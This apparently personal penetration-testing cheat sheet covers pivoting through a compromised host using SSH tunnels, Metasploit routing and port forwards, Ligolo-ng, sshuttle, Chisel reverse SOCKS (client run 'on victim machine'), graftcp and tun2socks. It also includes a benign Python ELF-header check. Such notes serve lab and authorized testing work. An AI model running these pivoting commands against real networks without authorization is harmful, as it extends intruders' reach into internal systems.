Pivoting

Tools and Techniques

SSH

# Dynamic ssh-tunnel
ssh -D localhost:9050 -f -N <USER>@<DOMAIN>
# Run commands through the tunnel with: proxychains <Command>
# Not all tools are proxy aware

Metasploit

  • Socks Proxy

# Add a route to the internal subnet through the current session
Meterpreter> run autoroute -s 172.16.2.0/24
background
# Expose the routed subnet via a SOCKS proxy on port 9050
use auxiliary/server/socks_proxy
set SRVPORT 9050
run
  • Port forward

# Forward remote 172.16.2.5:22 to local port 1337
Meterpreter> portfwd add -r 172.16.2.5 -p 22 -L 127.0.0.1 -l 1337

Ligolo-ng

Setup

sudo ip tuntap add user root mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 172.16.1.0/24 dev ligolo
  • Server

./proxy -selfcert
  • Client

./agent -connect <SERVER-IP>:11601 -ignore-cert

sshuttle

sshuttle acts like a VPN, so hosts behind the tunnel are reachable without proxychains.

sshuttle [--dns] -vr root@10.10.110.100 0/0 --ssh-cmd 'ssh -i 10.10.110.100/root-id-rsa' -D

Con: no internet access on HTB

Proxychains does not work with Go binaries: it uses LD_PRELOAD to hijack dynamically linked library calls, and Go binaries are statically linked and never go through them.

See graftcp and tun2socks below.

Chisel

Installation

go install github.com/jpillora/chisel@latest
  • Server

# On attacker machine
./chisel server --reverse --port 54321
  • Client

# On victim machine (opens a SOCKS proxy on the server at 127.0.0.1:9050)
./chisel client <SERVER>:54321 R:127.0.0.1:9050:socks

The server and client must be the same version.

Graftcp

graftcp can redirect the TCP connections made by a program (application, script, shell, etc.) to a SOCKS5 or HTTP proxy.

Compared with tsocks, proxychains or proxychains-ng, graftcp does not use the LD_PRELOAD trick, which only works for dynamically linked programs (e.g. applications built with Go cannot be hooked by proxychains-ng). graftcp can trace and modify the connections of any given program via ptrace(2).
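To see in advance whether proxychains can hook a given binary (the LD_PRELOAD limitation noted above for Go binaries and in the graftcp description), check the ELF program headers for a PT_INTERP entry: only binaries that request the dynamic loader go through ld.so, and only those can be intercepted by LD_PRELOAD. This is an added example, not part of the original notes; the build_elf helper constructs a minimal test image so the check runs offline, and can_proxychains_hook is a hypothetical name.

```python
import struct

PT_DYNAMIC = 2
PT_INTERP = 3


def needs_dynamic_loader(data: bytes) -> bool:
    """Return True if an ELF64 little-endian image has a PT_INTERP segment.

    PT_INTERP names the dynamic loader (ld.so); LD_PRELOAD-based tools such as
    proxychains only work for such binaries. Statically linked Go binaries
    carry no PT_INTERP and therefore cannot be hooked that way.
    """
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    if data[4] != 2 or data[5] != 1:
        raise ValueError("only ELF64 little-endian is handled here")
    e_phoff, = struct.unpack_from("<Q", data, 32)          # program header table offset
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    for i in range(e_phnum):
        p_type, = struct.unpack_from("<I", data, e_phoff + i * e_phentsize)
        if p_type == PT_INTERP:
            return True
    return False


def can_proxychains_hook(path: str) -> bool:
    """Convenience wrapper (hypothetical name): read a file and apply the check."""
    with open(path, "rb") as f:
        return needs_dynamic_loader(f.read())


def build_elf(phdr_types) -> bytes:
    """Construct a minimal, non-runnable ELF64 image with the given program
    header types. Test fixture only, so the check can be exercised offline."""
    phoff = 64  # program headers follow the 64-byte ELF header
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little-endian
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, phoff, 0, 0,
                        64, 56, len(phdr_types), 64, 0, 0)
    phdrs = b"".join(struct.pack("<IIQQQQQQ", t, 0, 0, 0, 0, 0, 0, 0)
                     for t in phdr_types)
    return ehdr + phdrs


if __name__ == "__main__":
    print("dynamic image:", needs_dynamic_loader(build_elf([PT_INTERP, PT_DYNAMIC])))
    print("static image: ", needs_dynamic_loader(build_elf([1, 1])))  # PT_LOAD only
```

On a real system, running the check on a statically linked Go binary returns False, which is the case where graftcp or tun2socks is needed instead of proxychains.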

Installation

wget https://github.com/hmgle/graftcp/releases/download/v0.4.0/graftcp_0.4.0-1_amd64.deb
sudo dpkg -i ./graftcp_0.4.0-1_amd64.deb

Usage

# Start the local forwarder that relays to the SOCKS5 proxy
sudo graftcp-local -socks5 127.0.0.1:9050
# Run the program through it
graftcp <Program>

# Alternatively, with the combined binary
sudo mgraftcp --socks5 127.0.0.1:9050 <Program>

Check the repository for more instructions.

Tun2socks

  • Proxy Everything: Handle all network traffic of any internet programs sent by the device through a proxy.

  • Proxy Protocols: HTTP/Socks4/Socks5/Shadowsocks with authentication support for remote connections.

  • Run Everywhere: Linux/macOS/Windows/FreeBSD/OpenBSD multi-platform support with specific optimization.

  • Gateway Mode: Act as a layer three gateway to handle network traffic from other devices in the same network.

  • Full IPv6 Support: All functions work in IPv6, tunnel IPv4 connections through IPv6 proxy and vice versa.

  • Network Stack: Powered by the user-space TCP/IP stack from gVisor, Google's container application kernel.

Installation

go install github.com/xjasonlyu/tun2socks/v2@latest

Usage

# Runs in the foreground: background it or use a second terminal
sudo `which tun2socks` -device tun://tun1 -proxy socks5://127.0.0.1:9050 &
sudo ip link set tun1 up
sudo ip route add <destination network> dev tun1
